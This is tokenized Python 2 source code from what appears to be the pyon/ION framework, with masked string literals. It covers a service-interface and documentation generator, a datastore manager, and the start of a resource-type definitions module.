"<STR_LIT>" <EOL> sorted_services = [ ] <EOL> service_set = set ( [ k for k , v in service_dep_graph . iteritems ( ) if len ( v ) == <NUM_LIT:0> ] ) <EOL> while len ( service_set ) > <NUM_LIT:0> : <EOL> n = service_set . pop ( ) <EOL> if n in raw_services : <EOL> sorted_services . append ( ( n , raw_services [ n ] ) ) <EOL> depending_services = [ k for k , v in service_dep_graph . iteritems ( ) if n in v ] <EOL> for depending_service in depending_services : <EOL> service_dep_graph [ depending_service ] . remove ( n ) <EOL> if len ( service_dep_graph [ depending_service ] ) == <NUM_LIT:0> : <EOL> service_set . add ( depending_service ) <EOL> remaining_deps = set ( [ k for k , v in service_dep_graph . iteritems ( ) if len ( v ) > <NUM_LIT:0> ] ) <EOL> if len ( remaining_deps ) : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> for k , v in service_dep_graph . iteritems ( ) : <EOL> if len ( v ) == <NUM_LIT:0> : <EOL> continue <EOL> print >> sys . stderr , "<STR_LIT:\t>" , k , "<STR_LIT>" , "<STR_LIT:U+002C>" . join ( v ) <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> raise StandardError ( "<STR_LIT>" % str ( remaining_deps ) ) <EOL> for svc in sorted_services : <EOL> svc_name , raw_def = svc <EOL> self . generate_service ( raw_def [ '<STR_LIT>' ] , raw_def , client_defs , opts , rpv_convos_enabled ) <EOL> count += <NUM_LIT:1> <EOL> if count > <NUM_LIT:0> and not opts . dryrun : <EOL> print "<STR_LIT>" , sigfile <EOL> with open ( sigfile , '<STR_LIT:w>' ) as f : <EOL> f . write ( yaml . dump ( svc_signatures ) ) <EOL> self . load_mods ( "<STR_LIT>" , True ) <EOL> base_subtypes = self . find_subtypes ( BaseService ) <EOL> self . load_mods ( "<STR_LIT>" , False ) <EOL> '''<STR_LIT>''' <EOL> self . generate_validation_report ( ) <EOL> exitcode = <NUM_LIT:0> <EOL> if count > <NUM_LIT:0> and opts . dryrun : <EOL> exitcode = <NUM_LIT:1> <EOL> return exitcode <EOL> def build_class_doc_string ( self , base_doc_str , _def_spec ) : <EOL> '''<STR_LIT>''' <EOL> doc_str = base_doc_str <EOL> if _def_spec : <EOL> first_time = True <EOL> for url in _def_spec . split ( '<STR_LIT:U+0020>' ) : <EOL> if first_time : <EOL> doc_str += '<STR_LIT:\n>' <EOL> first_time = False <EOL> doc_str += "<STR_LIT>" + url <EOL> return doc_str <EOL> def _get_default ( self , v ) : <EOL> if type ( v ) is str : <EOL> if v . startswith ( "<STR_LIT:!>" ) : <EOL> val = v . strip ( "<STR_LIT:!>" ) <EOL> if val in self . enums_by_name : <EOL> enum_def = self . enums_by_name [ val ] <EOL> val = "<STR_LIT>" + val + "<STR_LIT:.>" + enum_def [ "<STR_LIT:default>" ] <EOL> else : <EOL> val = "<STR_LIT:None>" <EOL> else : <EOL> val = "<STR_LIT>" % ( v ) <EOL> return val <EOL> elif type ( v ) in ( int , long , float ) : <EOL> return str ( v ) <EOL> elif type ( v ) is bool : <EOL> return "<STR_LIT:True>" if v else "<STR_LIT:False>" <EOL> else : <EOL> return "<STR_LIT:None>" <EOL> def find_object_reference ( self , arg ) : <EOL> for obj , node in self . object_references . iteritems ( ) : <EOL> if node . find ( arg ) > - <NUM_LIT:1> : <EOL> return obj <EOL> return "<STR_LIT>" <EOL> def build_exception_doc_html ( self , _def ) : <EOL> args = [ ] <EOL> for key , val in ( _def or { } ) . iteritems ( ) : <EOL> args . append ( html_doc_templates [ '<STR_LIT>' ] . substitute ( type = key , description = val ) ) <EOL> args_str = '<STR_LIT>' . join ( args ) <EOL> return args_str <EOL> def build_args_doc_html ( self , _def ) : <EOL> args = [ ] <EOL> for key , val in ( _def or { } ) . iteritems ( ) : <EOL> if isinstance ( val , datetime . datetime ) : <EOL> val = "<STR_LIT>" <EOL> elif isinstance ( val , dict ) : <EOL> val = self . find_object_reference ( key ) <EOL> elif isinstance ( val , list ) : <EOL> val = "<STR_LIT:list>" <EOL> else : <EOL> val = str ( type ( val ) ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> args . append ( html_doc_templates [ '<STR_LIT>' ] . substitute ( name = key , val = val ) ) <EOL> args_str = '<STR_LIT>' . join ( args ) <EOL> return args_str <EOL> def build_args_doc_string ( self , base_doc_str , _def_spec , _def_in , _def_out , _def_throws ) : <EOL> doc_str = base_doc_str <EOL> if _def_spec : <EOL> first_time = True <EOL> for url in _def_spec . split ( '<STR_LIT:U+0020>' ) : <EOL> if first_time : <EOL> doc_str += '<STR_LIT:\n>' <EOL> first_time = False <EOL> doc_str += templates [ '<STR_LIT>' ] . substitute ( link = url ) <EOL> first_time = True <EOL> for key , val in ( _def_in or { } ) . iteritems ( ) : <EOL> if isinstance ( val , basestring ) : <EOL> if val . startswith ( "<STR_LIT:!>" ) : <EOL> val = val . strip ( "<STR_LIT:!>" ) <EOL> else : <EOL> val = '<STR_LIT:str>' <EOL> elif isinstance ( val , datetime . datetime ) : <EOL> val = "<STR_LIT>" <EOL> elif isinstance ( val , dict ) : <EOL> val = self . find_object_reference ( key ) <EOL> elif isinstance ( val , list ) : <EOL> val = "<STR_LIT:list>" <EOL> else : <EOL> val = str ( type ( val ) ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if first_time : <EOL> doc_str += '<STR_LIT:\n>' <EOL> first_time = False <EOL> doc_str += templates [ '<STR_LIT>' ] . substitute ( in_name = key , in_type = val ) <EOL> for key , val in ( _def_out or { } ) . iteritems ( ) : <EOL> if isinstance ( val , basestring ) : <EOL> if val . startswith ( "<STR_LIT:!>" ) : <EOL> val = val . strip ( "<STR_LIT:!>" ) <EOL> else : <EOL> val = '<STR_LIT:str>' <EOL> elif isinstance ( val , datetime . datetime ) : <EOL> val = "<STR_LIT>" <EOL> elif isinstance ( val , dict ) : <EOL> val = self . find_object_reference ( key ) <EOL> elif isinstance ( val , list ) : <EOL> val = "<STR_LIT:list>" <EOL> else : <EOL> val = str ( type ( val ) ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if first_time : <EOL> doc_str += '<STR_LIT:\n>' <EOL> first_time = False <EOL> doc_str += templates [ '<STR_LIT>' ] . substitute ( out_name = key , out_type = val ) <EOL> if _def_throws : <EOL> for key , val in ( _def_throws or { } ) . iteritems ( ) : <EOL> if first_time : <EOL> doc_str += '<STR_LIT:\n>' <EOL> first_time = False <EOL> doc_str += templates [ '<STR_LIT>' ] . substitute ( except_name = key , except_info = val ) <EOL> return doc_str <EOL> def doc_tag_constructor ( self , loader , node ) : <EOL> '''<STR_LIT>''' <EOL> for key_node , value_node in node . value : <EOL> print key_node , "<STR_LIT>" , value_node <EOL> self . object_references [ str ( node . tag [ <NUM_LIT:1> : ] ) ] = str ( node . start_mark ) <EOL> return str ( node . tag ) <EOL> def service_name_from_file_name ( self , file_name ) : <EOL> '''<STR_LIT>''' <EOL> file_name = os . path . basename ( file_name ) . split ( '<STR_LIT:.>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> return file_name . title ( ) . replace ( '<STR_LIT:_>' , '<STR_LIT>' ) . replace ( '<STR_LIT:->' , '<STR_LIT>' ) <EOL> def find_subtypes ( self , clz ) : <EOL> '''<STR_LIT>''' <EOL> res = [ ] <EOL> for cls in clz . __subclasses__ ( ) : <EOL> assert hasattr ( cls , '<STR_LIT:name>' ) , '<STR_LIT>' % cls <EOL> res . append ( cls ) <EOL> return res <EOL> def generate_service ( self , interface_file , svc_def , client_defs , opts , rpv_convos_enabled ) : <EOL> """<STR_LIT>""" <EOL> service_name = svc_def [ '<STR_LIT:name>' ] <EOL> class_docstring = svc_def [ '<STR_LIT>' ] <EOL> class_spec = svc_def [ '<STR_LIT>' ] <EOL> dependencies = svc_def [ '<STR_LIT>' ] <EOL> meth_list = svc_def [ '<STR_LIT>' ] <EOL> interface_name = svc_def [ '<STR_LIT>' ] <EOL> class_name = self . service_name_from_file_name ( interface_name ) <EOL> if service_name is None : <EOL> raise IonServiceDefinitionError ( "<STR_LIT>" % interface_file ) <EOL> print '<STR_LIT>' % ( interface_name , interface_file ) <EOL> methods = [ ] <EOL> class_methods = [ ] <EOL> client_methods = [ ] <EOL> doc_methods = [ ] <EOL> for op_name , op_def in meth_list . iteritems ( ) : <EOL> if not op_def : <EOL> continue <EOL> def_docstring , def_spec , def_in , def_out , def_throws = op_def . get ( '<STR_LIT>' , "<STR_LIT>" ) , op_def . get ( '<STR_LIT>' , None ) , op_def . get ( '<STR_LIT>' , None ) , op_def . get ( '<STR_LIT>' , None ) , op_def . get ( '<STR_LIT>' , None ) <EOL> docstring_lines = def_docstring . split ( '<STR_LIT:\n>' ) <EOL> first_time = True <EOL> docstring_formatted = "<STR_LIT>" <EOL> for i in range ( len ( docstring_lines ) ) : <EOL> docstring_line = docstring_lines [ i ] <EOL> if docstring_line == "<STR_LIT>" and i == len ( docstring_lines ) - <NUM_LIT:1> : <EOL> break <EOL> if first_time : <EOL> first_time = False <EOL> else : <EOL> docstring_formatted += "<STR_LIT>" <EOL> docstring_formatted += docstring_line <EOL> if def_in is not None and '<STR_LIT>' in def_in : <EOL> raise StandardError ( "<STR_LIT>" % ( op_name , service_name ) ) <EOL> args_str , class_args_str = self . build_args_str ( def_in , False ) , self . build_args_str ( def_in , True ) <EOL> docstring_str = templates [ '<STR_LIT>' ] . substitute ( methoddocstr = self . build_args_doc_string ( docstring_formatted , def_spec , def_in , def_out , def_throws ) ) <EOL> outargs_str = '<STR_LIT>' . join ( yaml . dump ( def_out ) . split ( '<STR_LIT:\n>' ) ) <EOL> methods . append ( templates [ '<STR_LIT>' ] . substitute ( name = op_name , args = args_str , methoddocstring = docstring_str , outargs = outargs_str ) ) <EOL> class_methods . append ( templates [ '<STR_LIT>' ] . substitute ( name = op_name , args = class_args_str , methoddocstring = docstring_str , outargs = outargs_str ) ) <EOL> clientobjargs = '<STR_LIT>' <EOL> if def_in : <EOL> all_client_obj_args = [ ] <EOL> for k , v in def_in . iteritems ( ) : <EOL> d = self . _get_default ( v ) <EOL> if d == "<STR_LIT:None>" : <EOL> all_client_obj_args . append ( client_templates [ '<STR_LIT>' ] . substitute ( name = k , default = d ) ) <EOL> else : <EOL> all_client_obj_args . append ( client_templates [ '<STR_LIT>' ] . substitute ( name = k ) ) <EOL> clientobjargs = "<STR_LIT:U+002C>" . join ( all_client_obj_args ) <EOL> req_in_obj_name = "<STR_LIT>" % ( service_name , op_name ) <EOL> client_methods . append ( client_templates [ '<STR_LIT>' ] . substitute ( name = op_name , <EOL> args = class_args_str , <EOL> methoddocstring = docstring_str , <EOL> req_in_obj_name = req_in_obj_name , <EOL> req_in_obj_args = clientobjargs , <EOL> outargs = outargs_str ) ) <EOL> if opts . servicedoc : <EOL> doc_inargs_str = self . build_args_doc_html ( def_in ) <EOL> doc_outargs_str = self . build_args_doc_html ( def_out ) <EOL> doc_exceptions_str = self . build_exception_doc_html ( def_throws ) <EOL> methoddocstring = docstring_formatted . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> doc_methods . append ( html_doc_templates [ '<STR_LIT>' ] . substitute ( name = op_name , inargs = doc_inargs_str , methoddocstring = methoddocstring , outargs = doc_outargs_str , exceptions = doc_exceptions_str ) ) <EOL> if "<STR_LIT>" in dependencies : <EOL> dep_clients_extra = templates [ '<STR_LIT>' ] . substitute ( ) <EOL> else : <EOL> dep_clients_extra = "<STR_LIT>" <EOL> dep_clients = [ ( x , client_defs [ x ] [ <NUM_LIT:1> ] ) for x in dependencies ] <EOL> dep_clients_str = "<STR_LIT:\n>" . join ( map ( lambda x2 : templates [ '<STR_LIT>' ] . substitute ( svc = "<STR_LIT>" % x2 [ <NUM_LIT:0> ] if x2 [ <NUM_LIT:0> ] == "<STR_LIT>" else x2 [ <NUM_LIT:0> ] , clientclass = x2 [ <NUM_LIT:1> ] ) , dep_clients ) ) <EOL> dep_client_imports_str = "<STR_LIT:\n>" . join ( [ templates [ '<STR_LIT>' ] . substitute ( clientmodule = client_defs [ x ] [ <NUM_LIT:0> ] , clientclass = client_defs [ x ] [ <NUM_LIT:1> ] ) for x in dependencies ] ) <EOL> service_name_str = templates [ '<STR_LIT>' ] . substitute ( name = service_name ) <EOL> class_docstring_str = templates [ '<STR_LIT>' ] . substitute ( classdocstr = self . build_class_doc_string ( class_docstring , class_spec ) ) <EOL> dependencies_str = templates [ '<STR_LIT>' ] . substitute ( namelist = dependencies ) <EOL> methods_str = '<STR_LIT>' . join ( methods ) or '<STR_LIT>' <EOL> classmethods_str = '<STR_LIT>' . join ( class_methods ) <EOL> _class = templates [ '<STR_LIT:class>' ] . substitute ( name = class_name , <EOL> classdocstring = class_docstring_str , <EOL> servicename = service_name_str , <EOL> dependencies = dependencies_str , <EOL> methods = methods_str , <EOL> classmethods = classmethods_str ) <EOL> clients_holder_str = templates [ '<STR_LIT>' ] . substitute ( name = class_name , <EOL> dep_clients = dep_clients_str , <EOL> dep_clients_extra = dep_clients_extra ) <EOL> _client_methods = '<STR_LIT>' . join ( client_methods ) <EOL> _client_class = client_templates [ '<STR_LIT:class>' ] . substitute ( name = class_name , <EOL> clientdocstring = '<STR_LIT>' , <EOL> methods = _client_methods ) <EOL> _client_rpcclient = client_templates [ '<STR_LIT>' ] . substitute ( name = class_name , <EOL> targetname = service_name ) <EOL> if rpv_convos_enabled : <EOL> _client_convorpc_client = client_templates [ '<STR_LIT>' ] . substitute ( name = class_name , <EOL> targetname = service_name ) <EOL> _client = client_templates [ '<STR_LIT>' ] . substitute ( client = _client_class , <EOL> rpcclient = _client_rpcclient , <EOL> processrpcclient = '<STR_LIT>' , <EOL> conversationrpcclient = _client_convorpc_client ) <EOL> else : <EOL> _client_processrpc_client = client_templates [ '<STR_LIT>' ] . substitute ( name = class_name , <EOL> targetname = service_name ) <EOL> _client = client_templates [ '<STR_LIT>' ] . substitute ( client = _client_class , <EOL> rpcclient = _client_rpcclient , <EOL> processrpcclient = _client_processrpc_client , <EOL> conversationrpcclient = '<STR_LIT>' ) <EOL> interface_contents = templates [ '<STR_LIT:file>' ] . substitute ( dep_client_imports = dep_client_imports_str , <EOL> clientsholder = clients_holder_str , <EOL> classes = _class , <EOL> when_generated = self . currtime , <EOL> client = _client ) <EOL> if not self . opts . dryrun : <EOL> with open ( interface_file , '<STR_LIT:w>' ) as f : <EOL> f . write ( interface_contents ) <EOL> doc_methods_str = '<STR_LIT>' . join ( doc_methods ) <EOL> doc_page_contents = html_doc_templates [ '<STR_LIT>' ] . substitute ( name = class_name , methods = doc_methods_str ) <EOL> if not self . opts . dryrun and opts . servicedoc : <EOL> doc_file = interface_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> doc_file = doc_file . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> parent_dir = os . path . dirname ( doc_file ) <EOL> if not os . path . exists ( parent_dir ) : <EOL> os . makedirs ( parent_dir ) <EOL> with open ( doc_file , '<STR_LIT:w>' ) as f1 : <EOL> f1 . write ( doc_page_contents ) <EOL> def get_service_definition_file_path ( self , service_dir = None ) : <EOL> yaml_file_re = re . compile ( '<STR_LIT>' ) <EOL> service_definitions_filename = OrderedDict ( ) <EOL> if self . read_from_yaml_file : <EOL> for root , dirs , files in os . walk ( service_dir ) : <EOL> for filename in fnmatch . filter ( files , '<STR_LIT>' ) : <EOL> yaml_file = os . path . join ( root , filename ) <EOL> file_match = yaml_file_re . match ( yaml_file ) <EOL> if '<STR_LIT>' in filename : <EOL> continue <EOL> if file_match is None : <EOL> continue <EOL> service_definitions_filename [ yaml_file ] = yaml_file <EOL> return service_definitions_filename <EOL> else : <EOL> for key in self . service_definitions_filename . keys ( ) : <EOL> filename = self . service_definitions_filename [ key ] <EOL> file_match = yaml_file_re . match ( filename ) <EOL> if '<STR_LIT>' in filename : <EOL> continue <EOL> if file_match is None : <EOL> continue <EOL> service_definitions_filename [ filename ] = filename <EOL> return service_definitions_filename <EOL> def get_yaml_text ( self , path ) : <EOL> '''<STR_LIT>''' <EOL> if self . read_from_yaml_file : <EOL> with open ( path , '<STR_LIT:r>' ) as f : <EOL> return f . read ( ) <EOL> else : <EOL> self . dir = DirectoryStandalone ( sysname = self . system_name ) <EOL> data = self . dir . lookup_by_path ( path ) <EOL> for item in data : <EOL> return ( item . value [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> return '<STR_LIT>' <EOL> def get_object_definition ( self ) : <EOL> if self . read_from_yaml_file : <EOL> data_yaml_files = list_files_recursive ( '<STR_LIT>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> data = '<STR_LIT>' . join ( ( file . read ( ) for file in ( open ( path , '<STR_LIT:r>' ) for path in data_yaml_files if os . path . exists ( path ) ) ) ) <EOL> else : <EOL> data = get_object_definition_from_datastore ( self . system_name ) <EOL> return data <EOL> def get_service_definition ( self ) : <EOL> if self . read_from_yaml_file : <EOL> print "<STR_LIT>" <EOL> service_yaml_files = list_files_recursive ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> data = '<STR_LIT>' . join ( ( file . read ( ) for file in ( open ( path , '<STR_LIT:r>' ) for path in service_yaml_files if os . path . exists ( path ) ) ) ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> data = get_service_definition_from_datastore ( self . system_name ) <EOL> return data <EOL> def build_args_str ( self , _def , include_self = True ) : <EOL> '''<STR_LIT>''' <EOL> args = [ ] <EOL> if include_self : <EOL> args . append ( '<STR_LIT>' ) <EOL> for key , val in ( _def or { } ) . iteritems ( ) : <EOL> if isinstance ( val , basestring ) : <EOL> if val . startswith ( "<STR_LIT:!>" ) : <EOL> val = val . strip ( "<STR_LIT:!>" ) <EOL> if val in self . enums_by_name : <EOL> enum_def = self . enums_by_name [ val ] <EOL> val = "<STR_LIT>" + val + "<STR_LIT:.>" + enum_def [ "<STR_LIT:default>" ] <EOL> else : <EOL> val = "<STR_LIT:None>" <EOL> else : <EOL> val = "<STR_LIT>" % ( val ) <EOL> elif isinstance ( val , datetime . datetime ) : <EOL> val = "<STR_LIT>" % ( val ) <EOL> elif isinstance ( val , list ) : <EOL> val = "<STR_LIT:None>" <EOL> elif isinstance ( val , dict ) : <EOL> val = "<STR_LIT:None>" <EOL> elif isinstance ( val , tuple ) : <EOL> val = "<STR_LIT:None>" <EOL> args . append ( templates [ '<STR_LIT>' ] . substitute ( name = key , val = val ) ) <EOL> args_str = '<STR_LIT:U+002CU+0020>' . join ( args ) <EOL> return args_str <EOL> def generate_validation_report ( self ) : <EOL> from pyon . core import bootstrap <EOL> bootstrap . bootstrap_pyon ( ) <EOL> validation_results = "<STR_LIT>" + self . currtime + "<STR_LIT:\n>" <EOL> self . load_mods ( "<STR_LIT>" , True ) <EOL> base_subtypes = self . find_subtypes ( BaseService ) <EOL> self . load_mods ( "<STR_LIT>" , False ) <EOL> self . load_mods ( "<STR_LIT>" , False ) <EOL> for base_subtype in base_subtypes : <EOL> base_subtype_name = base_subtype . __module__ + "<STR_LIT:.>" + base_subtype . __name__ <EOL> compare_methods = { } <EOL> for method_tuple in inspect . getmembers ( base_subtype , inspect . ismethod ) : <EOL> method_name = method_tuple [ <NUM_LIT:0> ] <EOL> method = method_tuple [ <NUM_LIT:1> ] <EOL> if method_name . startswith ( "<STR_LIT:_>" ) : <EOL> continue <EOL> if method_name not in base_subtype . __dict__ : <EOL> continue <EOL> compare_methods [ method_name ] = method <EOL> impl_subtypes = self . find_subtypes ( base_subtype ) <EOL> if len ( impl_subtypes ) == <NUM_LIT:0> : <EOL> validation_results += "<STR_LIT>" % base_subtype_name <EOL> validation_results += "<STR_LIT>" <EOL> for impl_subtype in self . find_subtypes ( base_subtype ) : <EOL> impl_subtype_name = impl_subtype . __module__ + "<STR_LIT:.>" + impl_subtype . __name__ <EOL> added_class_names = False <EOL> found_error = False <EOL> for key in compare_methods : <EOL> if key not in impl_subtype . __dict__ : <EOL> found_error = True <EOL> if not added_class_names : <EOL> added_class_names = True <EOL> validation_results += "<STR_LIT>" % base_subtype_name <EOL> validation_results += "<STR_LIT>" % impl_subtype_name <EOL> validation_results += "<STR_LIT>" % key <EOL> else : <EOL> base_params = inspect . getargspec ( compare_methods [ key ] ) <EOL> impl_params = inspect . getargspec ( impl_subtype . __dict__ [ key ] ) <EOL> if base_params != impl_params : <EOL> found_error = True <EOL> if not added_class_names : <EOL> added_class_names = True <EOL> validation_results += "<STR_LIT>" % base_subtype_name <EOL> validation_results += "<STR_LIT>" % impl_subtype_name <EOL> validation_results += "<STR_LIT>" % key <EOL> validation_results += "<STR_LIT>" % str ( base_params ) <EOL> validation_results += "<STR_LIT>" % str ( impl_params ) <EOL> if found_error is False : <EOL> validation_results += "<STR_LIT>" % base_subtype_name <EOL> validation_results += "<STR_LIT>" % impl_subtype_name <EOL> validation_results += "<STR_LIT>" <EOL> reportfile = os . path . join ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> try : <EOL> os . unlink ( reportfile ) <EOL> except : <EOL> pass <EOL> print "<STR_LIT>" + reportfile + "<STR_LIT:'>" <EOL> if self . opts . dryrun : <EOL> with open ( reportfile , '<STR_LIT:w>' ) as f : <EOL> f . write ( validation_results ) <EOL> def load_mods ( self , path , interfaces ) : <EOL> mod_prefix = string . replace ( path , "<STR_LIT:/>" , "<STR_LIT:.>" ) <EOL> encountered_load_error = False <EOL> for mod_imp , mod_name , is_pkg in pkgutil . iter_modules ( [ path ] ) : <EOL> if is_pkg : <EOL> self . load_mods ( path + "<STR_LIT:/>" + mod_name , interfaces ) <EOL> else : <EOL> mod_qual = "<STR_LIT>" % ( mod_prefix , mod_name ) <EOL> try : <EOL> __import__ ( mod_qual ) <EOL> except Exception , ex : <EOL> encountered_load_error = True <EOL> print "<STR_LIT>" % ( mod_qual , ex ) <EOL> traceback . print_exc ( ) <EOL> if not interfaces : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> if encountered_load_error : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from pyon . core . bootstrap import get_sys_name , CFG <EOL> from pyon . datastore . datastore_common import DatastoreFactory , DataStore <EOL> from pyon . util . log import log <EOL> from pyon . util . arg_check import validate_true <EOL> class DatastoreManager ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , container = None ) : <EOL> self . _datastores = { } <EOL> self . container = container <EOL> def start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> log . debug ( "<STR_LIT>" , len ( self . _datastores ) ) <EOL> some_datastore = None <EOL> for ds in self . _datastores . itervalues ( ) : <EOL> if not some_datastore and hasattr ( ds , "<STR_LIT>" ) : <EOL> some_datastore = ds <EOL> try : <EOL> ds . close ( ) <EOL> except Exception as ex : <EOL> log . exception ( "<STR_LIT>" ) <EOL> self . _datastores = { } <EOL> if some_datastore : <EOL> try : <EOL> some_datastore . close_all ( ) <EOL> except Exception as ex : <EOL> log . exception ( "<STR_LIT>" ) <EOL> @ classmethod <EOL> def get_scoped_name ( cls , ds_name ) : <EOL> return ( "<STR_LIT>" % ( get_sys_name ( ) , ds_name ) ) . lower ( ) <EOL> def get_datastore ( self , ds_name , profile = None , config = None ) : <EOL> """<STR_LIT>""" <EOL> validate_true ( ds_name , '<STR_LIT>' ) <EOL> if ( ds_name , profile ) in self . _datastores : <EOL> log . debug ( "<STR_LIT>" % ( ds_name , profile ) ) <EOL> return self . _datastores [ ( ds_name , profile ) ] <EOL> log . info ( "<STR_LIT>" % ( ds_name , ds_name , profile ) ) <EOL> new_ds = DatastoreManager . get_datastore_instance ( ds_name , profile ) <EOL> if not new_ds . datastore_exists ( ds_name ) : <EOL> new_ds . create_datastore ( ds_name , create_indexes = True , profile = profile ) <EOL> else : <EOL> new_ds . define_profile_views ( profile = profile , keepviews = True ) <EOL> new_ds . local_name = ds_name <EOL> new_ds . ds_profile = profile <EOL> self . _datastores [ ( ds_name , profile ) ] = new_ds <EOL> return new_ds <EOL> @ classmethod <EOL> def get_datastore_instance ( cls , ds_name , profile = None ) : <EOL> profile = profile or DataStore . DS_PROFILE_MAPPING . get ( ds_name , DataStore . DS_PROFILE . BASIC ) <EOL> new_ds = DatastoreFactory . get_datastore ( datastore_name = ds_name , profile = profile , scope = get_sys_name ( ) , <EOL> config = CFG , variant = DatastoreFactory . DS_FULL ) <EOL> return new_ds <EOL> @ classmethod <EOL> def exists ( cls , ds_name , scoped = True , config = None ) : <EOL> if scoped : <EOL> ds_name = DatastoreManager . get_scoped_name ( ds_name ) <EOL> generic_ds = cls . get_datastore_instance ( "<STR_LIT>" ) <EOL> return generic_ds . datastore_exists ( ds_name ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import inspect <EOL> import types <EOL> import time <EOL> from pyon . core . registry import getextends , issubtype , is_ion_object , isenum <EOL> from pyon . core . bootstrap import IonObject <EOL> from pyon . core . exception import BadRequest , NotFound , Inconsistent , Unauthorized <EOL> from pyon . util . config import Config <EOL> from pyon . util . containers import DotDict , named_any , get_ion_ts <EOL> from pyon . util . execute import get_method_arguments , get_remote_info , execute_method <EOL> from pyon . util . log import log <EOL> ObjectTypes = DotDict ( ) <EOL> OT = ObjectTypes <EOL> ResourceTypes = DotDict ( ) <EOL> RT = ResourceTypes <EOL> Predicates = DotDict ( ) <EOL> PredicateType = DotDict ( ) <EOL> PRED = PredicateType <EOL> CompoundAssociations = DotDict ( ) <EOL> LifeCycleStates = DotDict ( ) <EOL> LCS = LifeCycleStates <EOL> LCS_NONE = "<STR_LIT>" <EOL> AvailabilityStates = DotDict ( ) <EOL> AS = AvailabilityStates <EOL> LCE = DotDict ( ) <EOL> lcs_workflow_defs = { } <EOL> lcs_workflows = { } <EOL> def get_predicate_type_list ( ) : <EOL> """<STR_LIT>""" <EOL> Predicates . clear ( ) <EOL> assoc_defs = Config ( [ "<STR_LIT>" ] ) . data [ '<STR_LIT>' ] <EOL> for ad in assoc_defs : <EOL> if ad [ '<STR_LIT>' ] in Predicates : <EOL> raise Inconsistent ( '<STR_LIT>' % ad [ '<STR_LIT>' ] ) <EOL> Predicates [ ad [ '<STR_LIT>' ] ] = ad <EOL> return Predicates . keys ( ) <EOL> def get_compound_associations_list ( ) : <EOL> """<STR_LIT>""" <EOL> CompoundAssociations . clear ( ) <EOL> CompoundAssociations . update ( Config ( [ "<STR_LIT>" ] ) . data [ '<STR_LIT>' ] ) <EOL> return CompoundAssociations . keys ( ) <EOL> def initialize_res_lcsms ( ) : <EOL> """<STR_LIT>""" <EOL> res_lifecycle = ( Config ( [ "<STR_LIT>" ] ) ) . data <EOL> lcs_workflow_defs . clear ( ) <EOL> lcsm_defs = res_lifecycle [ "<STR_LIT>" ] <EOL> for wf in lcsm_defs : <EOL> wfname = wf [ '<STR_LIT:name>' ] <EOL> clsname = wf . get ( '<STR_LIT>' , None ) <EOL> if clsname : <EOL> wf_cls = named_any ( clsname ) <EOL> lcs_workflow_defs [ wfname ] = wf_cls ( ** wf ) <EOL> else : <EOL> based_on = wf . get ( '<STR_LIT>' , None ) <EOL> wf_base = lcs_workflow_defs [ based_on ] <EOL> lcs_workflow_defs [ wfname ] = wf_base . _clone_with_restrictions ( wf ) <EOL> lcs_workflows . clear ( ) <EOL> for res_type , wf_name in res_lifecycle [ "<STR_LIT>" ] . iteritems ( ) : <EOL> lcs_workflows [ res_type ] = lcs_workflow_defs [ wf_name ] <EOL> def load_definitions ( ) : <EOL> """<STR_LIT>""" <EOL> ot_list = getextends ( '<STR_LIT>' ) <EOL> ot_list . append ( '<STR_LIT>' ) <EOL> ObjectTypes . clear ( ) <EOL> ObjectTypes . update ( zip ( ot_list , ot_list ) ) <EOL> ObjectTypes . lock ( ) <EOL> rt_list = getextends ( '<STR_LIT>' ) <EOL> rt_list . append ( '<STR_LIT>' ) <EOL> ResourceTypes . clear ( ) <EOL> ResourceTypes . update ( zip ( rt_list , rt_list ) ) <EOL> ResourceTypes . lock ( ) <EOL> pt_list = get_predicate_type_list ( ) <EOL> PredicateType . clear ( ) <EOL> PredicateType . update ( zip ( pt_list , pt_list ) ) <EOL> PredicateType . lock ( ) <EOL> get_compound_associations_list ( ) <EOL> initialize_res_lcsms ( ) <EOL> lcstates , avstates , fsmevents = get_all_lcsm_names ( ) <EOL> LifeCycleStates . clear ( ) <EOL> LifeCycleStates . update ( zip ( lcstates , lcstates ) ) <EOL> LifeCycleStates . lock ( ) <EOL> AvailabilityStates . clear ( ) <EOL> AvailabilityStates . update ( zip ( avstates , avstates ) ) <EOL> AvailabilityStates . lock ( ) <EOL> LCE . clear ( ) <EOL> LCE . update ( zip ( [ e . upper ( ) for e in fsmevents ] , fsmevents ) ) <EOL> LCE . lock ( ) <EOL> def is_resource ( object ) : <EOL> """<STR_LIT>""" <EOL> return issubtype ( object . type_ , "<STR_LIT>" ) <EOL> def create_access_args ( current_actor_id = None , superuser_actor_ids = None ) : <EOL> """<STR_LIT>""" <EOL> access_args = dict ( current_actor_id = current_actor_id , <EOL> superuser_actor_ids = superuser_actor_ids ) <EOL> return access_args <EOL> def get_object_schema ( resource_type ) : <EOL> """<STR_LIT>""" <EOL> schema_info = dict ( ) <EOL> schema_info [ '<STR_LIT>' ] = dict ( ) <EOL> ion_object_name = str ( resource_type ) <EOL> ret_obj = IonObject ( ion_object_name , { } ) <EOL> if hasattr ( ret_obj , "<STR_LIT>" ) : 